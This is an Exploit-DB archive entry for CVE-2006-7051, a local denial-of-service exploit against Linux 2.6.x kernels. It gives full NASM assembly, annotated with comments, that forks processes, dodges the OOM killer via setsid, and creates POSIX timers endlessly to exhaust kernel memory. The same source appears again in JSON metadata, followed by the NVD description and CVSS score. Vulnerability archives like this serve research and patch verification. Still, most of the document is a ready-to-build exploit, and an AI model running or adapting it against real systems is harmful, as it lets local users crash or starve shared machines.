Linux Kernel 2.6.x - sys_timer_create Local Denial of Service Exploit
2006-04-09T00:00:00
ID EDB-ID:1657 Type exploitdb Reporter fingerout Modified 2006-04-09T00:00:00
Description
Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit. CVE-2006-7051. DoS exploit for the Linux platform.
;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o
; NASM (Intel syntax), 32-bit x86 Linux ELF. System calls go through
; int 0x80 with the call number in eax and arguments in ebx, ecx, edx.
; Proof of concept for CVE-2006-7051: the listing exists to show that POSIX
; timers created in a loop keep consuming kernel memory (see loopek).
section .text
global _start
count equ 8 ; threads count - do it quicker
; Entry point: create `count` worker processes, then exit the parent.
_start:
mov ebx, count ; ebx = number of children still to create
call create_threads ; returns only in the parent; children go to consume
jmp done ; parent leaves via exit(0), jumping over _pause
; _pause: thin wrapper around pause() (i386 syscall 29).
; Nothing in this listing calls it, so it is dead code as published.
_pause:
mov eax,29 ; __NR_pause
int 0x80
ret
; create_threads: fork once per remaining count held in ebx.
; In:    ebx = children still to create (set to `count` by _start)
; Out:   returns to the caller in the parent only; every child jumps to
;        consume and never comes back.
; Clobb: eax, ebx, flags
; Despite the name these are full processes: i386 syscall 2 is fork.
; A failed fork leaves a negative errno in eax; that is nonzero, so it is
; handled like the parent path and the failure goes unreported.
create_threads:
mov eax,2 ; __NR_fork
int 0x80
test eax,eax ; eax == 0 only in the child
jz consume
dec ebx ; parent: one fewer child left to create
test ebx,ebx
jnz create_threads
ret
; consume: body of every child. It moves into its own session and then
; creates POSIX timers forever without deleting any. Per the CVE-2006-7051
; description, those timers are allocated in kernel memory that is not
; treated as part of the process's memory, which is the defect shown here.
; NOTE(review): on kernels that charge each timer's queued signal against
; RLIMIT_SIGPENDING, that limit bounds this loop - confirm for the kernel
; being assessed.
; Detection: a sustained burst of timer_create calls with no matching
; timer_delete, issued by newly forked session leaders, is the pattern to
; audit for.
consume:
; setsid() is i386 syscall 66; the three trailing comments below are the
; original author's rationale for calling it.
setsid: ; so we won't get counted as one thread in oom_killer()
xor ebx,ebx ; each task will have about 20 oom_score which
mov eax,66 ; is less than 'init' and others
int 0x80
push eax ; reserves one stack dword, reused below as the timer id slot
loopek:
mov eax,259 ; __NR_timer_create
mov ebx,0 ; clockid 0 = CLOCK_REALTIME
mov ecx,0 ; sevp = NULL, i.e. default notification
mov edx,esp ; timerid out-pointer -> the dword pushed above
int 0x80 ; result in eax is never checked, so errors do not end the loop
jmp loopek
; done: parent exit path, reached from _start once the fork loop returns.
; The parent terminates immediately; the forked children keep running.
done:
xor ebx,ebx ; exit status = 0
mov eax,1 ; __NR_exit
int 0x80
; milw0rm.com [2006-04-09]
{"bulletinFamily": "exploit", "id": "EDB-ID:1657", "cvelist": ["CVE-2006-7051"], "modified": "2006-04-09T00:00:00", "lastseen": "2016-01-31T14:37:54", "edition": 1, "sourceData": ";nasm -f elf noHeaven.asm\n;ld -s -o noHeaven noHeaven.o\n\nsection .text\n global _start\n\ncount equ 8 ; threads count - do it quicker\n\n_start:\n mov ebx, count\n call create_threads\n jmp done\n_pause:\n mov eax,29\n int 0x80\n ret\ncreate_threads:\n mov eax,2\n int 0x80\n test eax,eax\n jz consume\n dec ebx\n test ebx,ebx\n jnz create_threads\n ret\nconsume:\nsetsid: ; so we won't get counted as one thread in oom_killer()\n xor ebx,ebx ; each task will have about 20 oom_score which\n mov eax,66 ; is less than 'init' and others\n int 0x80\n push eax\nloopek:\n mov eax,259\n mov ebx,0\n mov ecx,0\n mov edx,esp\n int 0x80\n jmp loopek\ndone:\n xor ebx,ebx\n mov eax,1\n int 0x80\n\n; milw0rm.com [2006-04-09]\n", "published": "2006-04-09T00:00:00", "href": "https://www.exploit-db.com/exploits/1657/", "osvdbidlist": ["40963"], "reporter": "fingerout", "hash": "6bb14b1b28bbe3490e31d2e7f34708e2af3b33c615a2142a42ba147a3df07da9", "title": "Linux Kernel 2.6.x - sys_timer_create Local Denial of Service Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit. CVE-2006-7051. Dos exploit for linux platform", "references": [], "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1657/", "enchantments": {"vulnersScore": 2.1}}
{"result": {"cve": [{"id": "CVE-2006-7051", "type": "cve", "title": "CVE-2006-7051", "description": "The sys_timer_create function in posix-timers.c for Linux kernel 2.6.x allows local users to cause a denial of service (memory consumption) and possibly bypass memory limits or cause other processes to be killed by creating a large number of posix timers, which are allocated in kernel memory but are not treated as part of the process' memory.", "published": "2007-02-23T19:28:00", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7051", "cvelist": ["CVE-2006-7051"], "lastseen": "2017-10-11T11:06:55"}]}}